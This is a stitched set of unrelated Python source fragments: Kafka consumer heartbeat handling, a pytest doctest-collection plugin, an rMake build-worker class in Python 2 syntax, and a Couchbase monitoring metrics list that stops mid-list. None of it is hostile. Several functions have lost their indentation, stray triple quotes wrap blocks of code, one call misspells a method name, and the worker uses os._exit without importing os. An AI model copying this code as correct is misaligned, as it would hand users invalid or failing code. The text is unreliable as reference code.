        log.debug("Received successful heartbeat response.")
        future.success(None)
    elif error_type in (Errors.GroupCoordinatorNotAvailableError,
                        Errors.NotCoordinatorForGroupError):
        log.info("Heartbeat failed: coordinator is either not started or"
                 " not valid; will refresh metadata and retry")
        self.coordinator_dead()
        future.failure(error_type())
    elif error_type is Errors.RebalanceInProgressError:
        log.info("Heartbeat failed: group is rebalancing; re-joining group")
        self.rejoin_needed = True
        future.failure(error_type())
    elif error_type is Errors.IllegalGenerationError:
        log.info("Heartbeat failed: local generation id is not current;"
                 " re-joining group")
        self.rejoin_needed = True
        future.failure(error_type())
    elif error_type is Errors.UnknownMemberIdError:
        log.info("Heartbeat failed: local member_id was not recognized;"
                 " resetting and re-joining group")
        self.member_id = JoinGroupRequest.UNKNOWN_MEMBER_ID
        self.rejoin_needed = True
        # BUG FIX: this branch previously failed the future with the
        # exception *class* (`error_type`) instead of an instance,
        # unlike every other branch in this handler.
        future.failure(error_type())
    elif error_type is Errors.GroupAuthorizationFailedError:
        error = error_type(self.group_id)
        log.error("Heartbeat failed: authorization error: %s", error)
        future.failure(error)
    else:
        error = error_type()
        log.error("Heartbeat failed: Unhandled error: %s", error)
        future.failure(error)
class HeartbeatTask(object):
    """Self-rescheduling task that sends periodic heartbeats on behalf of
    a coordinator while group membership is active."""
    def __init__(self, coordinator):
        self._coordinator = coordinator
        self._heartbeat = coordinator.heartbeat
        self._client = coordinator._client
        # At most one heartbeat request may be outstanding at a time.
        self._request_in_flight = False
    def reset(self):
        # start or restart the heartbeat task to be executed at the next chance
        self._heartbeat.reset_session_timeout()
        try:
            self._client.unschedule(self)
        except KeyError:
            # not currently scheduled
            pass
        if not self._request_in_flight:
            self._client.schedule(self, time.time())
    def __call__(self):
        # Invoked by the client scheduler: decide whether to heartbeat now,
        # reschedule for later, or stop (rejoin pending / coordinator lost).
        if (self._coordinator.generation < 0 or
            self._coordinator.need_rejoin() or
            self._coordinator.coordinator_unknown()):
            # no need to send the heartbeat we're not using auto-assignment
            # or if we are awaiting a rebalance
            log.debug("Skipping heartbeat: no auto-assignment"
                      " or waiting on rebalance")
            return
        if self._heartbeat.session_expired():
            # we haven't received a successful heartbeat in one session interval
            # so mark the coordinator dead
            log.error("Heartbeat session expired - marking coordinator dead")
            self._coordinator.coordinator_dead()
            return
        if not self._heartbeat.should_heartbeat():
            # we don't need to heartbeat now, so reschedule for when we do
            ttl = self._heartbeat.ttl()
            log.debug("Heartbeat task unneeded now, retrying in %s", ttl)
            self._client.schedule(self, time.time() + ttl)
        else:
            self._heartbeat.sent_heartbeat()
            self._request_in_flight = True
            future = self._coordinator._send_heartbeat_request()
            future.add_callback(self._handle_heartbeat_success)
            future.add_errback(self._handle_heartbeat_failure)
    def _handle_heartbeat_success(self, v):
        log.debug("Received successful heartbeat")
        self._request_in_flight = False
        self._heartbeat.received_heartbeat()
        # schedule the next heartbeat when this one's ttl expires
        ttl = self._heartbeat.ttl()
        self._client.schedule(self, time.time() + ttl)
    def _handle_heartbeat_failure(self, e):
        log.debug("Heartbeat failed; retrying")
        self._request_in_flight = False
        # retry after the configured backoff
        etd = time.time() + self._coordinator.config['retry_backoff_ms'] / 1000.0
        self._client.schedule(self, etd)
'''
class GroupCoordinatorMetrics(object):
def __init__(self, metrics, prefix, tags=None):
self.metrics = metrics
self.group_name = prefix + "-coordinator-metrics"
self.heartbeat_latency = metrics.sensor("heartbeat-latency")
self.heartbeat_latency.add(metrics.metricName(
"heartbeat-response-time-max", self.group_name,
"The max time taken to receive a response to a heartbeat request",
tags), metrics.Max())
self.heartbeat_latency.add(metrics.metricName(
"heartbeat-rate", self.group_name,
"The average number of heartbeats per second",
tags), metrics.Rate(metrics.Count()))
self.join_latency = metrics.sensor("join-latency")
self.join_latency.add(metrics.metricName(
"join-time-avg", self.group_name,
"The average time taken for a group rejoin",
tags), metrics.Avg())
self.join_latency.add(metrics.metricName(
"join-time-max", self.group_name,
"The max time taken for a group rejoin",
tags), metrics.Avg())
self.join_latency.add(metrics.metricName(
"join-rate", self.group_name,
"The number of group joins per second",
tags), metrics.Rate(metrics.Count()))
self.sync_latency = metrics.sensor("sync-latency")
self.sync_latency.add(metrics.metricName(
"sync-time-avg", self.group_name,
"The average time taken for a group sync",
tags), metrics.Avg())
self.sync_latency.add(metrics.MetricName(
"sync-time-max", self.group_name,
"The max time taken for a group sync",
tags), metrics.Avg())
self.sync_latency.add(metrics.metricName(
"sync-rate", self.group_name,
"The number of group syncs per second",
tags), metrics.Rate(metrics.Count()))
"""
lastHeartbeat = Measurable(
measure=lambda _, value: value - heartbeat.last_heartbeat_send()
)
metrics.addMetric(metrics.metricName(
"last-heartbeat-seconds-ago", self.group_name,
"The number of seconds since the last controller heartbeat",
tags), lastHeartbeat)
"""
'''
|
|
""" discover and run doctests in modules and test files."""
from __future__ import absolute_import
import traceback
import pytest
from _pytest._code.code import TerminalRepr, ReprFileLocation, ExceptionInfo
from _pytest.python import FixtureRequest
def pytest_addoption(parser):
    # Register the doctest ini option plus the --doctest-* command line
    # options under pytest's "collect" option group.
    parser.addini('doctest_optionflags', 'option flags for doctests',
                  type="args", default=["ELLIPSIS"])
    group = parser.getgroup("collect")
    group.addoption("--doctest-modules",
                    action="store_true", default=False,
                    help="run doctests in all .py modules",
                    dest="doctestmodules")
    group.addoption("--doctest-glob",
                    action="append", default=[], metavar="pat",
                    help="doctests file matching pattern, default: test*.txt",
                    dest="doctestglob")
    group.addoption("--doctest-ignore-import-errors",
                    action="store_true", default=False,
                    help="ignore doctest ImportErrors",
                    dest="doctest_ignore_import_errors")
def pytest_collect_file(path, parent):
    """Collect .py files as doctest modules (when --doctest-modules is set)
    and matching text files as doctest files; otherwise collect nothing."""
    config = parent.config
    if path.ext == ".py":
        # .py files are only collected here when doctest-modules is enabled;
        # they are never treated as doctest text files.
        if config.option.doctestmodules:
            return DoctestModule(path, parent)
        return None
    if _is_doctest(config, path, parent):
        return DoctestTextfile(path, parent)
def _is_doctest(config, path, parent):
if path.ext in ('.txt', '.rst') and parent.session.isinitpath(path):
return True
globs = config.getoption("doctestglob") or ['test*.txt']
for glob in globs:
if path.check(fnmatch=glob):
return True
return False
class ReprFailDoctest(TerminalRepr):
    """Failure representation: pre-rendered text lines followed by the
    file location of the failing doctest example."""
    def __init__(self, reprlocation, lines):
        self.reprlocation = reprlocation
        self.lines = lines
    def toterminal(self, tw):
        for output_line in self.lines:
            tw.line(output_line)
        self.reprlocation.toterminal(tw)
class DoctestItem(pytest.Item):
    """pytest item wrapping a single doctest.DocTest for execution."""
    def __init__(self, name, parent, runner=None, dtest=None):
        super(DoctestItem, self).__init__(name, parent)
        self.runner = runner   # doctest runner shared across the module
        self.dtest = dtest     # the doctest.DocTest to execute
        self.obj = None
        self.fixture_request = None
    def setup(self):
        if self.dtest is not None:
            self.fixture_request = _setup_fixtures(self)
            # expose the `getfixture` helper inside the doctest namespace
            globs = dict(getfixture=self.fixture_request.getfuncargvalue)
            self.dtest.globs.update(globs)
    def runtest(self):
        _check_all_skipped(self.dtest)
        self.runner.run(self.dtest)
    def repr_failure(self, excinfo):
        """Render doctest failures with numbered source context and a diff
        (or traceback for unexpected exceptions)."""
        import doctest
        if excinfo.errisinstance((doctest.DocTestFailure,
                                  doctest.UnexpectedException)):
            doctestfailure = excinfo.value
            example = doctestfailure.example
            test = doctestfailure.test
            filename = test.filename
            if test.lineno is None:
                lineno = None
            else:
                lineno = test.lineno + example.lineno + 1
            message = excinfo.type.__name__
            reprlocation = ReprFileLocation(filename, lineno, message)
            checker = _get_checker()
            REPORT_UDIFF = doctest.REPORT_UDIFF
            if lineno is not None:
                lines = doctestfailure.test.docstring.splitlines(False)
                # add line numbers to the left of the error message
                lines = ["%03d %s" % (i + test.lineno + 1, x)
                         for (i, x) in enumerate(lines)]
                # trim docstring error lines to 10
                # BUG FIX: clamp the lower bound at 0 -- for examples within
                # the first 9 lines of the docstring, `example.lineno - 9`
                # went negative and silently selected the wrong slice.
                lines = lines[max(example.lineno - 9, 0):example.lineno + 1]
            else:
                lines = ['EXAMPLE LOCATION UNKNOWN, not showing all tests of that example']
                indent = '>>>'
                for line in example.source.splitlines():
                    lines.append('??? %s %s' % (indent, line))
                    indent = '...'
            if excinfo.errisinstance(doctest.DocTestFailure):
                lines += checker.output_difference(example,
                    doctestfailure.got, REPORT_UDIFF).split("\n")
            else:
                inner_excinfo = ExceptionInfo(excinfo.value.exc_info)
                lines += ["UNEXPECTED EXCEPTION: %s" %
                          repr(inner_excinfo.value)]
                lines += traceback.format_exception(*excinfo.value.exc_info)
            return ReprFailDoctest(reprlocation, lines)
        else:
            return super(DoctestItem, self).repr_failure(excinfo)
    def reportinfo(self):
        return self.fspath, None, "[doctest] %s" % self.name
def _get_flag_lookup():
    """Map option-flag names (as used in the ini setting) to their
    doctest flag values."""
    import doctest
    return {
        'DONT_ACCEPT_TRUE_FOR_1': doctest.DONT_ACCEPT_TRUE_FOR_1,
        'DONT_ACCEPT_BLANKLINE': doctest.DONT_ACCEPT_BLANKLINE,
        'NORMALIZE_WHITESPACE': doctest.NORMALIZE_WHITESPACE,
        'ELLIPSIS': doctest.ELLIPSIS,
        'IGNORE_EXCEPTION_DETAIL': doctest.IGNORE_EXCEPTION_DETAIL,
        'COMPARISON_FLAGS': doctest.COMPARISON_FLAGS,
        'ALLOW_UNICODE': _get_allow_unicode_flag(),
        'ALLOW_BYTES': _get_allow_bytes_flag(),
    }
def get_optionflags(parent):
    """OR together the doctest option flags named in the
    ``doctest_optionflags`` ini setting."""
    lookup = _get_flag_lookup()
    combined = 0
    for name in parent.config.getini("doctest_optionflags"):
        combined |= lookup[name]
    return combined
class DoctestTextfile(DoctestItem, pytest.Module):
    """Item for a standalone doctest text file (e.g. *.txt / *.rst)."""
    def runtest(self):
        import doctest
        fixture_request = _setup_fixtures(self)
        # inspired by doctest.testfile; ideally we would use it directly,
        # but it doesn't support passing a custom checker
        text = self.fspath.read()
        filename = str(self.fspath)
        name = self.fspath.basename
        # expose the `getfixture` helper inside the doctest namespace
        globs = dict(getfixture=fixture_request.getfuncargvalue)
        if '__name__' not in globs:
            globs['__name__'] = '__main__'
        optionflags = get_optionflags(self)
        runner = doctest.DebugRunner(verbose=0, optionflags=optionflags,
                                     checker=_get_checker())
        parser = doctest.DocTestParser()
        test = parser.get_doctest(text, globs, name, filename, 0)
        _check_all_skipped(test)
        runner.run(test)
def _check_all_skipped(test):
"""raises pytest.skip() if all examples in the given DocTest have the SKIP
option set.
"""
import doctest
all_skipped = all(x.options.get(doctest.SKIP, False) for x in test.examples)
if all_skipped:
pytest.skip('all tests skipped by +SKIP option')
class DoctestModule(pytest.Module):
    """Collects the doctests found in a Python module's docstrings."""
    def collect(self):
        import doctest
        if self.fspath.basename == "conftest.py":
            # conftest files must be imported through the plugin manager
            module = self.config.pluginmanager._importconftest(self.fspath)
        else:
            try:
                module = self.fspath.pyimport()
            except ImportError:
                if self.config.getvalue('doctest_ignore_import_errors'):
                    pytest.skip('unable to import module %r' % self.fspath)
                else:
                    raise
        # uses internal doctest module parsing mechanism
        finder = doctest.DocTestFinder()
        optionflags = get_optionflags(self)
        runner = doctest.DebugRunner(verbose=0, optionflags=optionflags,
                                     checker=_get_checker())
        for test in finder.find(module, module.__name__):
            if test.examples: # skip empty doctests
                yield DoctestItem(test.name, self, runner, test)
def _setup_fixtures(doctest_item):
    """
    Used by DoctestTextfile and DoctestItem to setup fixture information.
    """
    def func():
        # dummy callable: the fixture machinery only needs a function object
        pass
    doctest_item.funcargs = {}
    fm = doctest_item.session._fixturemanager
    doctest_item._fixtureinfo = fm.getfixtureinfo(node=doctest_item, func=func,
                                                  cls=None, funcargs=False)
    fixture_request = FixtureRequest(doctest_item)
    fixture_request._fillfixtures()
    return fixture_request
def _get_checker():
    """
    Returns a doctest.OutputChecker subclass that takes in account the
    ALLOW_UNICODE option to ignore u'' prefixes in strings and ALLOW_BYTES
    to strip b'' prefixes.
    Useful when the same doctest should run in Python 2 and Python 3.
    An inner class is used to avoid importing "doctest" at the module
    level.
    """
    # The checker class is memoized as an attribute on this function.
    if hasattr(_get_checker, 'LiteralsOutputChecker'):
        return _get_checker.LiteralsOutputChecker()
    import doctest
    import re
    class LiteralsOutputChecker(doctest.OutputChecker):
        """
        Copied from doctest_nose_plugin.py from the nltk project:
            https://github.com/nltk/nltk
        Further extended to also support byte literals.
        """
        # Match a u/U (resp. b/B) string-literal prefix so it can be stripped.
        _unicode_literal_re = re.compile(r"(\W|^)[uU]([rR]?[\'\"])", re.UNICODE)
        _bytes_literal_re = re.compile(r"(\W|^)[bB]([rR]?[\'\"])", re.UNICODE)
        def check_output(self, want, got, optionflags):
            res = doctest.OutputChecker.check_output(self, want, got,
                                                     optionflags)
            if res:
                return True
            allow_unicode = optionflags & _get_allow_unicode_flag()
            allow_bytes = optionflags & _get_allow_bytes_flag()
            if not allow_unicode and not allow_bytes:
                return False
            else: # pragma: no cover
                def remove_prefixes(regex, txt):
                    return re.sub(regex, r'\1\2', txt)
                if allow_unicode:
                    want = remove_prefixes(self._unicode_literal_re, want)
                    got = remove_prefixes(self._unicode_literal_re, got)
                if allow_bytes:
                    want = remove_prefixes(self._bytes_literal_re, want)
                    got = remove_prefixes(self._bytes_literal_re, got)
                # re-compare with the literal prefixes normalized away
                res = doctest.OutputChecker.check_output(self, want, got,
                                                         optionflags)
                return res
    _get_checker.LiteralsOutputChecker = LiteralsOutputChecker
    return _get_checker.LiteralsOutputChecker()
def _get_allow_unicode_flag():
"""
Registers and returns the ALLOW_UNICODE flag.
"""
import doctest
return doctest.register_optionflag('ALLOW_UNICODE')
def _get_allow_bytes_flag():
"""
Registers and returns the ALLOW_BYTES flag.
"""
import doctest
return doctest.register_optionflag('ALLOW_BYTES')
|
|
#
# Copyright (c) SAS Institute Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
The worker is in charge of taking build requests and monitoring them
until they complete.
"""
import select
import time
import traceback
from rmake.lib import pipereader
from rmake.lib import server
from rmake import errors
from rmake import failure
from rmake.worker import command
from rmake.worker.chroot import rootmanager
class Worker(server.Server):
    """
    The worker manages all operations that are performed on an individual
    package: currently resolving its dependencies and building it.

    Work arrives as "commands" (see commandClasses).  Commands are queued
    with queueCommand() and started from the serve loop whenever fewer
    than self.slots commands are running.  Commands that fork report
    their status back through marshal pipes read in handleRequestIfReady().
    """
    # Plugins may override the command class used to perform a particular
    # command by modifying this dict.
    commandClasses = { 'build' : command.BuildCommand,
                       'load' : command.LoadCommand,
                       'resolve' : command.ResolveCommand,
                       'stop' : command.StopCommand,
                       'session' : command.SessionCommand,
                       #'image' : imagecommand.ImageCommand }
                     }

    def __init__(self, serverCfg, logger, slots=1):
        """
        param serverCfg: server.servercfg.rMakeConfiguration instance
        param logger: lib.logger.Logger instance
        param slots: number of commands that can be run at once
        on this node.
        """
        self.cfg = serverCfg
        self.logger = logger
        server.Server.__init__(self, logger)
        # Raises before any command is accepted if the configuration
        # cannot support building.
        self.cfg.checkBuildSanity()
        self.idgen = CommandIdGen()
        self.chrootManager = rootmanager.ChrootManager(self.cfg, self.logger)
        # Set by _pidDied when a command's process is reaped; consumed
        # (and cleared) by _serveLoopHook.
        self._foundResult = False
        self._queuedCommands = [] # list of command classes + parameters
                                  # for commands waiting to be run
        self.commands = [] # list of command objects currently running
        self.slots = slots

    def hasActiveTroves(self):
        """Return true if any commands are running or waiting to run."""
        return self.commands or self._queuedCommands

    def buildTrove(self, buildCfg, jobId, trove, eventHandler,
                   buildReqs, crossReqs, targetLabel, logData=None,
                   logPath=None, commandId=None, builtTroves=None,
                   bootstrapReqs=()):
        """
        Queue a 'build' command for one trove.

        A chroot factory is created up front from the build requirements;
        the command itself runs later, once a slot is free.
        """
        if not commandId:
            commandId = self.idgen.getBuildCommandId(trove)
        if logPath is None:
            logPath = trove.logPath
        if builtTroves is None:
            builtTroves = []
        chrootFactory = self.chrootManager.getRootFactory(buildCfg, buildReqs,
                                                          crossReqs, bootstrapReqs, trove)
        self.queueCommand(self.commandClasses['build'], self.cfg, commandId,
                          jobId, eventHandler, buildCfg, chrootFactory,
                          trove, builtTroves, targetLabel, logData,
                          logPath)

    def actOnTrove(self, commandClassName, buildCfg, jobId, trove,
                   eventHandler, logData=None, logPath=None, commandId=None):
        """
        Queue a per-trove command by the name it is registered under in
        self.commandClasses (e.g. 'resolve').
        """
        if logPath is None:
            logPath = trove.logPath
        if not commandId:
            commandId = self.idgen.getActionCommandId(commandClassName, trove)
        self.queueCommand(self.commandClasses[commandClassName],
                          self.cfg, commandId,
                          jobId, eventHandler, buildCfg,
                          trove, logData, logPath)

    def loadTroves(self, job, troveList, eventHandler, reposName,
                   commandId=None):
        """Queue a 'load' command for the troves of a job."""
        if commandId is None:
            commandId = self.idgen.getLoadCommandId(job)
        self.queueCommand(self.commandClasses['load'], self.cfg,
                          commandId, job.jobId, eventHandler, job, troveList, reposName)

    def resolve(self, resolveJob, eventHandler, logData, commandId=None):
        """Queue a 'resolve' command for a dependency-resolution job."""
        if not commandId:
            commandId = self.idgen.getResolveCommandId(resolveJob.getTrove())
        jobId = resolveJob.getTrove().jobId
        self.queueCommand(self.commandClasses['resolve'], self.cfg, commandId,
                          jobId, eventHandler, logData, resolveJob)

    def stopCommand(self, targetCommandId, commandId=None):
        """
        Run a 'stop' command that kills the running command identified
        by targetCommandId, then mark its trove or job as failed.
        """
        targetCommand = self.getCommandById(targetCommandId)
        if not targetCommand:
            self.warning('Asked to stop unknown command %s' % targetCommandId)
            return
        if not commandId:
            commandId = self.idgen.getStopCommandId(targetCommandId)
        def killFn(pid):
            # Kill the whole process group; keep running the serve-loop
            # hook while waiting so finished children are still reaped.
            self._killPid(pid, killGroup=True,
                          hook=self._serveLoopHook)
        self.runCommand(self.commandClasses['stop'], self.cfg, commandId,
                        targetCommand, killFn)
        if targetCommand.trove:
            targetCommand.trove.troveFailed('Stop requested')
        elif targetCommand.job:
            targetCommand.job.jobFailed('Stop requested')
        else:
            self.warning('Command %s has no job or trove assigned -- '
                         'cannot fail job.', targetCommandId)

    def startSession(self, host, chrootPath, commandLine, superUser=False,
                     buildTrove=None):
        """
        Run a 'session' command inside an existing chroot.

        Blocks, serving the loop, until the session command reports its
        host info or errors.  Returns (True, hostInfo) on success or
        (False, failureReason) on error.
        """
        if host != '_local_':
            raise errors.RmakeError('Unknown host %s!' % host)
        try:
            chrootFactory = self.chrootManager.useExistingChroot(chrootPath,
                                                                 useChrootUser=not superUser,
                                                                 buildTrove=buildTrove)
            commandId = self.idgen.getSessionCommandId(chrootPath)
            cmd = self.runCommand(self.commandClasses['session'], self.cfg,
                                  commandId, chrootFactory, commandLine)
        except errors.RmakeError, err:
            f = failure.ChrootFailed('%s: %s' % (chrootPath, err))
            return False, f
        while not cmd.getHostInfo() and not cmd.isErrored():
            self.serve_once()
        if cmd.isErrored():
            return False, cmd.getFailureReason()
        return True, cmd.getHostInfo()

    def deleteChroot(self, host, chrootPath):
        """Delete a chroot on this (local) node."""
        if host != '_local_':
            raise errors.RmakeError('Unknown host %s!' % host)
        self.chrootManager.deleteChroot(chrootPath)

    def archiveChroot(self, host, chrootPath, newPath):
        """Archive a chroot on this (local) node; returns the new path."""
        if host != '_local_':
            raise errors.RmakeError('Unknown host %s!' % host)
        return self.chrootManager.archiveChroot(chrootPath, newPath)

    def queueCommand(self, commandClass, cfg, *args):
        """Add a command to the queue; it starts when a slot is free."""
        self._queuedCommands.append((commandClass, cfg, args))

    def listChroots(self):
        """Return the chroots known to the chroot manager."""
        return self.chrootManager.listChroots()

    def listChrootsWithHost(self):
        """Return (host, chroot) pairs; the host is always '_local_'."""
        return [('_local_', x) for x in self.chrootManager.listChroots()]

    def _checkForResults(self):
        """Run one maintenance pass; true if a command finished."""
        return self._serveLoopHook()

    def _serveLoopHook(self):
        """
        Called to do maintenance inbetween accepting requests.

        Checks for commands that have been added to the queue
        and starts them running if there's space.  Looks for
        children that have died that were forked by this process
        and handles them.
        """
        # called once every .1 seconds when serving.
        if self._queuedCommands and (len(self.commands) < self.slots):
            commandTuple = self._queuedCommands.pop(0)
            commandClass, cfg, args = commandTuple
            # A falsy return (not ready yet, or failed to instantiate)
            # puts the command back on the queue for a later pass.
            if not self.runCommand(commandClass, cfg, *args):
                self.queueCommand(commandClass, cfg, *args)
        self._collectChildren()
        if self._foundResult:
            self._foundResult = False
            return True
        return False

    def stopTroveLogger(self, trove):
        """Kill the trove's log process, if one was recorded on it."""
        if not hasattr(trove, 'logPid'):
            return
        pid = trove.logPid
        if self._isKnownPid(pid):
            self._killPid(pid)

    def handleRequestIfReady(self, sleep=0.1):
        """
        Called during serve loop to look for information being
        returned from commands.  Passes any read data to the local
        command instance for parsing.
        """
        # If a command involves forking, there are two versions of the
        # command object: one kept in the worker, its sibling forked
        # command that is doing the actual work.  Information is passed
        # back to the worker via pipes that are read here, and then
        # parsed by the worker-held instance of the command.
        ready = []
        try:
            # Command objects are passed straight to select(); they must
            # be selectable via the read pipe attached in runCommand.
            ready = select.select(self.commands, [], [], sleep)[0]
        except select.error, err:
            pass
        except IOError, err:
            # this could happen because a pipe has been closed. In this
            # case, we should notice the pid dying shortly anyway and
            # we'll get our error message there.
            pass
        for command in ready:
            # commands know how to handle their own information.
            command.handleRead()

    def listQueuedCommands(self):
        """Return the (commandClass, cfg, args) tuples waiting to run."""
        return self._queuedCommands

    def listCommands(self):
        """Return the command objects currently running."""
        return self.commands

    def getCommandById(self, commandId):
        """Return the running command with the given id, or None."""
        cmds = [ x for x in self.commands if x.getCommandId() == commandId]
        if not cmds:
            return None
        else:
            # Command ids are unique (see CommandIdGen).
            assert(len(cmds) == 1)
            return cmds[0]

    def runCommand(self, commandClass, cfg, commandId, *args):
        """
        Start the given command by instantiating the given class.

        Returns the command object that was created unless there
        was an error instantiating the command object, in which
        case None is returned.

        The function may also return False, which means that the
        command could not be run at this time (but did not error)

        If the command is forked, then the command object is appended
        to the list of running commands.
        """
        command = None
        try:
            # errors before this point imply a problem w/ the node.
            # Below this point it is a problem w/ the command.
            command = commandClass(cfg, commandId, *args)
            if not command.isReady():
                return False
            if command.shouldFork():
                inF, outF = pipereader.makeMarshalPipes()
                pid = self._fork('Command %s' % command.getCommandId())
                if not pid:
                    # Child process: run the command and never return.
                    try:
                        self._resetSignalHandlers()
                        inF.close()
                        command.setWritePipe(outF)
                        command.runCommandAndExit()
                    finally:
                        # Safety net so the child can never fall through
                        # into the parent's serve loop.
                        os._exit(1)
                else:
                    # Parent process: keep the read end of the pipe and
                    # track the running command.
                    command.pid = pid
                    outF.close()
                    command.setReadPipe(inF)
                    self.commands.append(command)
            else:
                # Unforked commands run synchronously, right here.
                command.runCommandNoExit()
                self.commandCompleted(command.getCommandId())
        except Exception, err:
            self.error(
                'Command %s got exception: %s: %s' % (commandId, err.__class__.__name__, err))
            tb = traceback.format_exc()
            self.commandErrored(commandId, str(err), tb)
            if command:
                command.commandErrored(str(err), tb)
        return command

    def _pidDied(self, pid, status, name=None):
        """
        Called automatically from collectChildren, after a pid has
        been collected through waitpid().

        If the pid is for a command, then we call status functions,
        commandCompleted and commandErrored, which can be overridden
        by plugins.
        """
        if name is None:
            name = self._pids.get(pid, 'Unknown')
        self.info('Pid %s (%s) died' % (pid, name))
        # Iterate over a copy: the matching command is removed below.
        for command in list(self.commands):
            if pid == command.pid:
                self._foundResult = True
                command.commandDied(status)
                if command.isErrored():
                    self.info('%s (Pid %s) errored' % (name, pid))
                    f = command.getFailureReason()
                    self.error(f)
                    self.commandErrored(command.getCommandId(), f)
                else:
                    self.info('%s (Pid %s) completed' % (name, pid))
                    self.commandCompleted(command.getCommandId())
                if command.getChrootFactory():
                    # Release the chroot now that the command is done.
                    self.chrootManager.chrootFinished(
                        command.getChrootFactory().getRoot())
                self.commands.remove(command)
                break
        server.Server._pidDied(self, pid, status, name)

    def commandErrored(self, command, msg, tb=''):
        """Plugin hook: a command failed.  'command' receives the
        command id (despite the parameter name -- see the call sites).
        Default is a no-op."""
        pass

    def commandCompleted(self, command):
        """Plugin hook: a command finished successfully.  'command'
        receives the command id.  Default is a no-op."""
        pass

    def stopAllCommands(self):
        """Issue a stop command for every currently running command."""
        for command in self.commands:
            self.stopCommand(command.commandId)
class CommandIdGen(object):
    """
    Tracker and generator for command ids to ensure that each
    commandId is unique.

    Each id is a descriptive base string (command type plus job id
    and/or trove name) with a per-base counter appended, so repeated
    requests with the same base yield BASE-1, BASE-2, ...
    """
    def __init__(self):
        # base id string -> number of ids handed out for that base
        self._commandIds = {}

    def getBuildCommandId(self, buildTrove):
        """Return a unique id for a 'build' command for buildTrove."""
        base = 'BUILD-%s-%s' % (buildTrove.jobId, buildTrove.getName())
        return self._getCommandId(base)

    def getLoadCommandId(self, job):
        """Return a unique id for a 'load' command for job."""
        base = 'LOAD-%s' % job.jobId
        return self._getCommandId(base)

    def getResolveCommandId(self, buildTrove):
        """Return a unique id for a 'resolve' command for buildTrove."""
        base = 'RESOLVE-%s-%s' % (buildTrove.jobId, buildTrove.getName())
        return self._getCommandId(base)

    def getStopCommandId(self, targetCommandId):
        """Return a unique id for a 'stop' command aimed at another command."""
        base = 'STOP-%s' % (targetCommandId)
        return self._getCommandId(base)

    def getSessionCommandId(self, chrootPath):
        """Return a unique id for a 'session' command in chrootPath."""
        base = 'SESSION-%s' % (chrootPath)
        return self._getCommandId(base)

    def getActionCommandId(self, commandClassName, trove):
        """Return a unique id for an arbitrary named command on trove."""
        base = '%s-%s-%s' % (commandClassName.upper(),
                             trove.jobId, trove.getName())
        return self._getCommandId(base)

    def _getCommandId(self, base):
        """Append the next counter value for 'base' and return the id.

        (The local previously shadowed the builtin 'str'; renamed.)
        """
        self._commandIds.setdefault(base, 0)
        self._commandIds[base] += 1
        return '%s-%s' % (base, self._commandIds[base])
|
|
from collections import OrderedDict, defaultdict, namedtuple
from cbmonitor import models
# Immutable record identifying one metric series: the cluster/server/
# bucket/index it belongs to, the metric name, and the collector that
# produced it (consumed by Report below).
Observable = namedtuple(
    "Observable", ["cluster", "server", "bucket", "index", "name", "collector"]
)
class Report(object):
"""Provide all existing observables that meet following requirements:
-- observable is in predefined dict of metrics (cls.METRICS)
-- observable belongs to snapshot (input parameter)
It supports arbitrary number of snapshots, each element includes a list of
observables, one observable per snapshot. Yield is skipped in case of full
snapshot mismatch (none of snapshot has corresponding observable object).
"""
METRICS = OrderedDict((
("active_tasks", [
"rebalance_progress",
"bucket_compaction_progress",
]),
("xdcr_lag", [
"xdcr_lag",
"xdcr_persistence_time",
"xdcr_diff",
]),
("sgimport_latency", [
"sgimport_latency",
]),
("spring_query_latency", [
"latency_query",
]),
("kvstore_stats", [
"BlockCacheQuota",
"WriteCacheQuota",
"BlockCacheMemUsed",
"BlockCacheHits",
"BlockCacheMisses",
"BloomFilterMemUsed",
"BytesIncoming",
"BytesOutgoing",
"BytesPerRead",
"IndexBlocksSize",
"MemoryQuota",
"NCommitBatches",
"NDeletes",
"NGets",
"NInserts",
"NReadBytes",
"NReadBytesCompact",
"NReadBytesGet",
"NReadIOs",
"NReadIOsGet",
"NSets",
"NSyncs",
"NTablesCreated",
"NTablesDeleted",
"NTableFiles",
"TableMetaMemUsed",
"NFileCountCompacts",
"NWriteBytes",
"NWriteBytesCompact",
"NWriteIOs",
"ReadAmp",
"ReadAmpGet",
"ReadIOAmp",
"BufferMemUsed",
"WALMemUsed",
"WALBufferMemUsed",
"TreeSnapshotMemoryUsed",
"ReadAheadBufferMemUsed",
"TableObjectMemUsed",
"WriteAmp",
"WriteCacheMemUsed",
"TotalBloomFilterMemUsed",
"NCompacts",
"TxnSizeEstimate",
"NFlushes",
"NGetsPerSec",
"NSetsPerSec",
"NDeletesPerSec",
"NCommitBatchesPerSec",
"NFlushesPerSec",
"NCompactsPerSec",
"NSyncsPerSec",
"NReadBytesPerSec",
"NReadBytesGetPerSec",
"NReadBytesCompactPerSec",
"BytesOutgoingPerSec",
"NReadIOsPerSec",
"NReadIOsGetPerSec",
"BytesIncomingPerSec",
"NWriteBytesPerSec",
"NWriteIOsPerSec",
"NWriteBytesCompactPerSec",
"RecentWriteAmp",
"RecentReadAmp",
"RecentReadAmpGet",
"RecentReadIOAmp",
"RecentBytesPerRead",
"NGetStatsPerSec",
"NGetStatsComputedPerSec",
"FlushQueueSize",
"CompactQueueSize",
"NBloomFilterHits",
"NBloomFilterMisses",
"BloomFilterFPR",
"NumNormalFlushes",
"NumPersistentFlushes",
"NumSyncFlushes",
"BlockCacheHitsPerSec",
"BlockCacheMissesPerSec",
"NBloomFilterHitsPerSec",
"NBloomFilterMissesPerSec",
"RecentBlockCacheHitRatio",
"BlockCacheHitRatio",
"ReadIOAmpSet",
"RecentReadIOAmpSet",
"NReadBytesSet",
"NReadIOsSet",
"NReadBytesSetPerSec",
"NReadIOsSetPerSec",
"ActiveIndexBlocksSize",
"NBlocksCached",
"CheckpointOverheadPeriod",
"CheckpointOverheadRatio",
]),
("cbstats_memory", [
"ep_mem_used_primary",
]),
("cbstats_all", [
"mem_used_secondary",
"ep_magma_total_mem_used",
"ep_magma_mem_used_diff",
]),
("n1ql_stats", [
"query_requests",
"query_selects",
"query_avg_req_time",
"query_avg_svc_time",
"query_avg_response_size",
"query_avg_result_count",
"query_errors",
"query_warnings",
"query_requests_250ms",
"query_requests_500ms",
"query_requests_1000ms",
